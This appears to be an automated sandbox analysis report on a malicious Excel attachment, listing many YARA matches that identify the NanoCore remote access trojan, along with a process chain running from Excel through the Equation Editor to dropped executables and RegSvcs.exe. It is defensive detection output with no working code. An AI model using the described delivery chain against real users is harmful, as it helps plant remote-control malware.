Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

5_2_00FE33A3

Found potential string decryption / allocating functions

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: String function: 00FF59E6 appears 65 times
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: String function: 00FC6B90 appears 39 times
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: String function: 00FC14F7 appears 36 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0027E2F0 appears 31 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0027D940 appears 51 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0027D870 appears 35 times

Contains functionality to communicate with device drivers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00266FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

4_2_00266FC6

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Import order764536.xlsx

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@16/49@20/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00266D06 GetLastError,FormatMessageW,

4_2_00266D06

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

4_2_0027963A

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe

Console Write: ........................................(.P.............p.......x.......H................................................................. .....

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
